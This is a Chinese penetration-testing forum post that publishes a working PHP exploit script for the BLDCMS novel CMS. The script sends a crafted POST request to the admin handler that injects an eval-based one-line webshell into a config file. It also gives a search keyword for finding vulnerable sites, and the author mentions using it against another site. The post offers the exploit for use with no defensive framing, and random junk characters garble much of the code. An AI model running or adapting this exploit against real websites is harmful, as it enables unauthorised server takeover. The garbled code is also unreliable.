找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 BLDCMS(白老大小说) Getshell 0day EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2026|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞6 [1 y2 Q  q, z. e

+ x# X& u9 k3 c1 U2 M ; |* |3 F( K& S
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 ( D6 P8 }% x0 {: j2 w) X( @0 W
6 D: O0 m: c- P6 L/ n
既然都有人发了 我就把我之前写好的EXP放出来吧+ H! f4 I2 }/ w
. X5 s$ v" Q" Q; h
view source print?01.php;">1 {3 M( {* v; H( B
02.<!--?php4 Y: h0 O' ?+ r3 g" q6 q! D3 q' s
03.echo "-------------------------------------------------------------------7 M- m6 a5 W0 k
04.
, U5 N4 D3 A, _2 I3 s05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP0 M$ B/ Z8 E0 h# Q) r% {$ u
06. 3 w3 x6 ^9 |1 [5 I
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun1 \% d  r( G+ i- K- N6 Y6 X
08. % t5 b$ B4 B. T$ ]
09.QQ:981009941\r\n                                2013.3.21\r\n             1 j6 }* J3 ~1 D" p( r& \& o" c
10. 1 O. T' D- J) w' J8 U5 A6 P
11. 0 y) w+ h) E; C8 l. y! k; Y
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码# S8 ?3 G4 _% {8 S' Y
13. 8 f3 ]7 P  t! P# e3 k
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------6 N9 u1 d0 ?8 ^* w3 D
15. / e5 a8 N8 L( ]3 M( b+ r$ P$ H
16.--------------------------------------------------------------------\r\n";/ _  w6 g. v* K) {, a
17.$url=$argv[1];
5 X; x& V/ L8 c18.$dir=$argv[2];0 h- l% X, b# `2 W3 @. R
19.$pass=$argv[3];
* u5 T' |5 q" s# e9 {% H8 F20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
! p, u$ ~0 d5 m* D2 D21.if (emptyempty($pass)||emptyempty($url))
1 B% D( \6 l1 _22.{exit("请输入参数");}3 W8 i, _! d, o$ b  c
23.else+ i. d2 d( q2 @3 h: N; i. e
24.{
, k* D. K1 }9 g2 P) W25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev4 h/ O) Y: b# W' X0 K6 _4 w1 L
26. ! n; D4 G+ s5 U2 P) f2 B
27.al;4 w% g; I9 g" T" B
28.$length = strlen($fuckdata);  H) }! b, W4 b9 q* m5 N" c
29.function getshell($url,$pass)
% ~. o6 U3 Y  W" K6 D3 m' b30.{
2 D; H6 A/ x% v6 |31.global $url,$dir,$pass,$eval,$length,$fuckdata;
# p1 ?8 [' ]8 A: V3 C& b5 ]32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";# G+ }# \/ B* R; E" {! Q) d
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";5 W. M2 l3 i: B: R& b, l6 C/ I
34.$header .= "User-Agent: MSIE\r\n";
: ~, [* e2 c+ D: r35.$header .= "Host:".$url."\r\n";, y, K% t3 C1 U" r: }& M% Q
36.$header .= "Content-Length: ".$length."\r\n";9 @: R& i0 x, `; o8 K1 p7 r) ]3 J
37.$header .= "Connection: Close\r\n";  r. |, x& D+ g/ L# D3 @/ g4 ?  M' l3 E
38.$header .="\r\n";
5 P: ?# S5 ?, I8 d( N5 ]39.$header .= $fuckdata."\r\n\r\n";
4 Z, D2 B0 e- o4 i40.$fp = fsockopen($url, 80,$errno,$errstr,15);
% ~% S( J+ j2 {41.if (!$fp)
) t( j6 ?8 r5 }/ l6 b42.{
0 o3 n# U' t' c2 H  g43.exit ("利用失败:请检查指定目标是否能正常打开");$ \+ D- x' M+ n3 n) P8 \2 ~' _' f
44.}% a5 {8 Q1 ^: T! o! K, ~% L$ G
45.else{ if (!fputs($fp,$header))3 Y2 |; I+ k) Y$ |
46.{exit ("利用失败");}
, X$ r; [' a$ c% P% P8 n47.else# W& F& q# K( c5 L; r9 S" W' d
48.{
  i. m- X* l# a" [" R4 A& H/ a49.$receive = '';
' k: @) y' M0 J. S8 V50.while (!feof($fp)) {  Q7 l" C  X0 Q1 T, O' I+ O
51.$receive .= @fgets($fp, 1000);4 E9 i* m! l6 |. u$ v% `
52.}5 u1 G3 T( Q) m  U# t
53.@fclose($fp);
- s, ]( k- d/ P, t7 U54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标' U8 p. t* G# K6 N) Z& x
55. 0 K4 v, z, V6 E3 }
56.GPC是否=off)";
, V4 P/ S* t9 v$ M57.}}$ T; A+ q2 ?* c+ h  f$ w) P4 y$ o
58.}$ t3 y7 Y% b5 H
59.}0 |' e: {: U- t  U- A& M3 H
60.getshell($url,$pass);* `/ A( w! I& \. |1 o! g
61.?-->) L8 L' ~- U6 ^* J+ W
1 X+ y$ K) o5 h% r
) l- O& w; S4 Z/ I+ B2 P9 B

: {' R* o+ R1 r& l5 s# Rby 数据流
/ k( d! u* {- z: z( b. r* e
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表